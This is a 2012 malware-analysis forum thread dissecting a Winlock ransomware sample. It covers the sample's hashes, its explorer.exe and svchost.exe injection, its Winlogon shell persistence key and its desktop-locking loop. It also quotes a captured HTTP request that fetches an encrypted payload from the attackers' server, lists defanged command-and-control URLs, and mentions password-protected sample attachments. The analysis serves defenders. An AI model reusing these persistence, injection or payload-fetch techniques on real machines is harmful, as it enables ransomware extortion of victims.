A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #15975  by rkhunter
 Sat Oct 13, 2012 10:32 am
Win32:Virut wrote:Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks
SHA256: e19c8f1ea80d6cf9d3348a07c7428bbcdfc66ea5a192f63e22a8e29cfda5aaf0
SHA1: fae01f374d5dde3271306aca91f842f9f0b17d75
MD5: 0efd95e4d3502e20b7120685050abae2
File size: 44032 bytes
Attachments
pass:infected
(28.42 KiB) Downloaded 112 times
 #16674  by rinn
 Sat Nov 17, 2012 6:09 pm
Hi.

This is interesting ransom. It is written in fasm 1.7 and this make it something special. Usually ransomware are Delphi applications which are written by people with no programming skills. This one is different. It still simple compared to famous trojans, but there are some features which are making it special.

It has three stage startup.

On a first stage it registers window class "SetupFrameClass" creates window called "Setup" and waits few milliseconds. After wnd_procedure (see @004012D0) assumes control, it calls specially prepared code (see @004013A0) responsible for second stage and further trojan installation.

Second stage - memory inject in explorer.exe. After this code activates it is creating new special desktop named wLockDesktop, starting zombified copy of svchost.exe with injected (again) trojan code and initial process desktop value set to be wLockDesktop. Then execution transfers to this zombified svchost.exe


Third stage is responsible for setting autorun registry key

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell with value explorer.exe,%userprofile%\Application Data\msconfig.dat

<--- it is ransom itself (copy file routine also take place in this stage).

Ransom (code running inside svchost.exe) ensures that wLockDesktop is current active desktop by doing periodical switching to it. This was made to defeat sysinternals desktops and similar tools.

Decrypted and working dropper in attach. Password "infected" without quotes.

Best Regards,
-rin
Attachments
(14.67 KiB) Downloaded 117 times
 #16678  by EP_X0FF
 Sun Nov 18, 2012 7:00 am
Switching to different desktop set in the infinite loop with a very small delay.
Code: Select all
00000039	273.98556519	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000040	274.08596802	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000041	274.18600464	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000042	274.28622437	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000043	274.38613892	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000044	274.48648071	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000045	274.59146118	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000046	274.68685913	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000047	274.78668213	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000048	274.90359497	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000049	275.01293945	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000050	275.10397339	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000051	275.20385742	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000052	275.32345581	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000053	275.43780518	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000054	275.52349854	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000055	275.62338257	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
00000056	275.72372437	[532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied	
Winlock window hierarhy (diffent run, that why different PID).

Image

Used embedded IE window to display HTML based content.

Payload requested in encrypted container, special marker appended to the beginning of request string - "55565755".
GET /555657550B8836F821F3BF69B40E8541B9BB830D10E570A1C1B HTTP/1.1
User-Agent: Our_Agent
Host: hhrbn.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 18 Nov 2012 01:11:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Cache-Control: public
Content-Disposition: attachment; filename=32721
Content-Transfer-Encoding: binary
Content-Length: 83722
Decrypts into %temp% folder and then executes by ransom from embedded full screen IE window. Ransom page + all graphics/css in attach.
Attachments
pass: malware
(68.05 KiB) Downloaded 109 times
 #16680  by Xylitol
 Sun Nov 18, 2012 10:43 am
EP_X0FF wrote:Host: hhrbn.ru
Not at home the weekend so can't attack/dissas stuff but found this
Code: Select all
rnmbe.su/hhrbn.ru
hxxp://46.37.162.28:80/user/login/ « auth service »
hxxp://hhrbn.ru:80/data.php
hxxp://hhrbn.ru:80/config.php
hxxp://hhrbn.ru:80/gateway.php
hxxp://hhrbn.ru:80/includes/rc4.php
hxxp://hhrbn.ru:80/includes/mysql.php
hxxp://hhrbn.ru:80/includes/functions.php
hxxp://hhrbn.ru:80/config/
hxxp://hhrbn.ru:80/cache/
mysql.php return "could not find driver" rest are standard HTTP 200/Length 0, probably need parameters.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 9